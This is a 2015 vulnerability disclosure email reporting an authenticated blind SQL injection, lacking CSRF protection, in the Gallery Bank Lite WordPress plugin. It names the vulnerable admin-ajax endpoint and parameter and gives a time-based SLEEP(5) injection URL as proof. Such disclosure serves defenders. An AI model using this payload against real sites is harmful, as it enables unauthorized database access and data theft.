Subject: Blind SQL injection in Gallery Bank Lite Edition Version 3.0.229

Date: Fri, 21 Aug 2015 10:51:57 +0200

Hello,

Plugin: Gallery Bank Lite Edition Version 3.0.229 https://wordpress.org/plugins/gallery-bank/

1. Blind SQL injection

Authenticated users (like editors) can execute arbitrary sql commands (there is no CSRF protection)

Method: GET

Url: http://localhost/wp-admin/admin-ajax.php?action=add_new_album_library&param=delete_pic&delete_array=[sqli]

Vulnerable parameters: delete_array

Example PHP callstack:

/gallery-bank/lib/add-new-album-class.php:178

wpdb::query

Verification:

http://localhost/wp-admin/admin-ajax.php?action=add_new_album_library&param=delete_pic&delete_array=-1)%20and%20(SELECT%20*%20FROM%20(SELECT%20SLEEP(5))XXX);%20--%20-

--

Regards,
Marcin Probola,